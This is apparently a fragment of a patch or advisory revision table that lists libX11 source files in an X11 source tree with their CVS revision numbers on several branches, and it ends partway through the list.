xsrc/external/mit/libX11/dist/src/AllCells.c              1.1.1.1.6.1      1.1.1.1.8.1      1.1.1.1.2.1  1.1.1.3.4.1  1.1.1.3.6.1  1.1.1.3.2.1
xsrc/external/mit/libX11/dist/src/Font.c                  1.1.1.1.2.1.2.1  1.1.1.1.2.1.4.1  1.1.1.1.2.2  1.1.1.5.4.1  1.1.1.5.6.1  1.1.1.5.2.1
xsrc/external/mit/libX11/dist/src/FontInfo.c              1.1.1.1.2.1.2.1  1.1.1.1.2.1.4.1  1.1.1.1.2.2  1.1.1.4.4.1  1.1.1.4.6.1  1.1.1.4.2.1
xsrc/external/mit/libX11/dist/src/FontNames.c             1.1.1.1.2.1.2.1  1.1.1.1.2.1.4.1  1.1.1.1.2.2  1.1.1.4.4.1  1.1.1.4.6.1  1.1.1.4.2.1
xsrc/external/mit/libX11/dist/src/GetFPath.c              1.1.1.1.6.1      1.1.1.1.8.1      1.1.1.1.2.1  1.1.1.3.4.1  1.1.1.3.6.1  1.1.1.3.2.1
xsrc/external/mit/libX11/dist/src/GetImage.c              1.1.1.1.2.1.2.1  1.1.1.1.2.1.4.1  1.1.1.1.2.2  1.1.1.4.4.1  1.1.1.4.6.1  1.1.1.4.2.1
xsrc/external/mit/libX11/dist/src/GetMoEv.c               1.1.1.1.2.1.2.1  1.1.1.1.2.1.4.1  1.1.1.1.2.2  1.1.1.4.4.1  1.1.1.4.6.1  1.1.1.4.2.1
xsrc/external/mit/libX11/dist/src/GetPntMap.c             1.1.1.1.2.1.2.1  1.1.1.1.2.1.4.1  1.1.1.1.2.2  1.1.1.4.4.1  1.1.1.4.6.1  1.1.1.4.2.1
xsrc/external/mit/libX11/dist/src/GetProp.c               1.1.1.1.2.1.2.1  1.1.1.1.2.1.4.1  1.1.1.1.2.2  1.1.1.5.4.1  1.1.1.5.6.1  1.1.1.5.2.1
xsrc/external/mit/libX11/dist/src/LiHosts.c               1.1.1.1.2.1.2.1  1.1.1.1.2.1.4.1  1.1.1.1.2.2  1.1.1.4.4.1  1.1.1.4.6.1  1.1.1.4.2.1
xsrc/external/mit/libX11/dist/src/ListExt.c